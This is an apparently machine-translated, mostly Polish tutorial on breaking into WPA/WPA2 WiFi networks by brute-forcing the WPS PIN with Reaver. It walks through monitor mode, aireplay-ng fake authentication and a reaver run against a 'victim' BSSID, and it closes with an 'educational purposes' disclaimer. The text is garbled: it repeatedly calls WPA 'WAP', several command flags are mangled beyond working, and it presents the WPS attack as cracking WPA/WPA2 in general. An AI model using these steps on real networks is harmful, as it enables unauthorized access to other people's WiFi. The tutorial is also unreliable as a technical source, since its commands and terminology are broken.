How to Hack WPA/WPA2 WiFi with Reaver

Wszyscy wiemy, że większość ludzi preferuje umieszczenie hasła WiFi do swojego połączenia bezprzewodowego. To może być tak proste, jak 12345 lub tak skomplikowane, jak kombinacja wielu liter, cyfr i znaków. Cóż, tutaj jest zła wiadomość, istnieje narzędzie o nazwie reaver, które mogą być używane do złamania hasła WAP/WAP2 WiFi.

About WEP, WAP i WAP2

Do poprawy funkcji WEP (Wired Equivalent Privacy), WiFi Protected Access lub WPA został stworzony w 2003 roku. To tymczasowe ulepszenie nadal ma stosunkowo słabe zabezpieczenia, ale jest łatwiejsze do skonfigurowania. WPA wykorzystuje protokół TKIP (Temporal Key Integrity Protocol) do bezpieczniejszego szyfrowania niż oferowane przez WEP.

Rok później, w 2004 r., udostępniono WiFi Protected Access 2. WPA2 zapewnia większe bezpieczeństwo i jest łatwiejszy do skonfigurowania niż wcześniejsze opcje. Główna różnica w przypadku WPA2 polega na tym, że używa on Advanced Encryption Standard (AES) zamiast TKIP.

To, czego potrzebujesz.

  • Adapter WiFi obsługujący tryb monitora
  • Komputer z WiFi
  • Bliska sieć WiFi zabezpieczona protokołem WPA
  • Zainstalowany Reaver
  • Persistence

Zakładam, że Twój router jest skonfigurowany tak, aby nie używać uwierzytelniania przyciskiem.(PBC)

Zróbmy to

Po pierwsze, jeśli używasz maszyny wirtualnej, musisz włączyć kontroler USB przechodząc do ustawień, następnie kliknij na USB i wybierz urządzenie USB.

NB: Upewnij się, że karta bezprzewodowa, której używasz obsługuje tryb monitora.

Potem uruchom następujące polecenie:

iwconfig

To polecenie pokazuje tylko interfejsy bezprzewodowe

Rozpocznij:

sudo ifconfig wlan0 down

To wyłącza WiFi

Ten:

sudo airmon-ng check kill

Ta komenda zabija każdy proces, który mógłby przeszkadzać w korzystaniu z mojego interfejsu w trybie monitora. Zabija menedżera sieci, aby nie było internetu.

Then run:

iwconfig wlan0 mode monitor

This command changes the mode from managed mode to monitor mode.

Tryb zarządzany jest trybem domyślnym dla wszystkich urządzeń bezprzewodowych.

Powodem, dla którego musimy zmienić tryb z zarządzanego na tryb monitora jest to, że nie tylko chcemy przechwytywać pakiety, które mają adres mac do naszego urządzenia, ale wszystkie pakiety, nawet te wysyłane do routera i innych urządzeń. Jest to możliwe tylko wtedy gdy karta WiFi jest w trybie monitora.

Następnie uruchom:

sudo ifconfig wlan0 up

To przywraca wifi.

Następnie uruchom:

iwconfig

To jest sprawdzenie czy nasz tryb zmienił się z zarządzanego na monitor. Jeśli tak, powinno to zostać zasygnalizowane w terminalu.

Na poniższym rysunku widać, że tryb zmienił się na monitor.

wash - interface wlan0

To pokazuje wszystkie Aps z włączonym WPS używające interfejsu bezprzewodowego.

Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0

W celu uzyskania mac ID otwórz nową kartę i wpisz ifconfig. Skopiuj pierwsze 12 cyfr z unspec w wlan0.

DON’T HIT ENTER YET.

Otwórz kolejną nową kartę.

Upewnij się, że masz zainstalowany reaver. Jeśli nie, uruchom następujące polecenie.

Sudo apt-get install aircrack-ng reaver

To zainstaluje reavera.

Reaver wymusza pin i kojarzy go z celem, gdy już go ma, używa go do obliczenia rzeczywistego klucza WAP/WAP2.

Następnie wykonaj następującą komendę:

Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate

Wciśnij enter na tej karcie i wciśnij enter na innej karcie, na której mówiłem, żebyś nie wciskał enter.

Powinno to potrwać kilka minut, ponieważ próbuje wszystkich możliwych kombinacji i w końcu poda Ci pin WPS, hasło WAP i nazwę Wi-Fi

DISCLAIMER. Ten artykuł służy do celów edukacyjnych, nie ponosimy odpowiedzialności za jakiekolwiek szkody wyrządzone podczas odwoływania się do niego.

Artykuł autorstwa Restercuter Nyawira, członka SheHacks KE, trenera i entuzjasty cyberbezpieczeństwa. Znajdź ją na LinkedIn (Restercuter Nyawira) i Twitterze @Restercuter1.

.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.